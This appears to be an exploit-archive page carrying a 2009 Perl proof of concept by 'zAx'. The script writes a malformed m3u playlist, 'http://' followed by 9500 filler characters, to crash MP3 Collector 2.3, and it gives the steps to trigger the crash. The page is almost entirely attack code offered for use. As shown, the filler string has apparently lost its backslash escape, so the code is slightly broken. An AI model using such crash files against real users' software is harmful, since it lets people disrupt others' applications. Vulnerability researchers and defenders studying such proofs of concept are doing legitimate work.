[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MP3 Collector 2.3 (m3u File) Local Crash PoC
# Published : 2009-09-15
# Author : zAx
# Previous Title : VLC Media Player < 0.9.6 (CUE) Local Buffer Overflow PoC
# Next Title : DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit
#!/usr/bin/perl
# MP3 Collector 2.3 (m3u File) Local Crash PoC
# By : zAx
# Application Homepage : http://collectorz.com
# Application Download : http://downloads.collectorz.com/mp3collectorsetup.exe
# Go to Playlist menu, select Open Playlist, Select the File and a click on file name.
$header = "http://";
$crash = "x41" x 9500; # Just a Random size .
my $file = "CraSH.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $header.$crash;
close($FILE);
print "Done n";
# www.Syue.com [2009-09-15]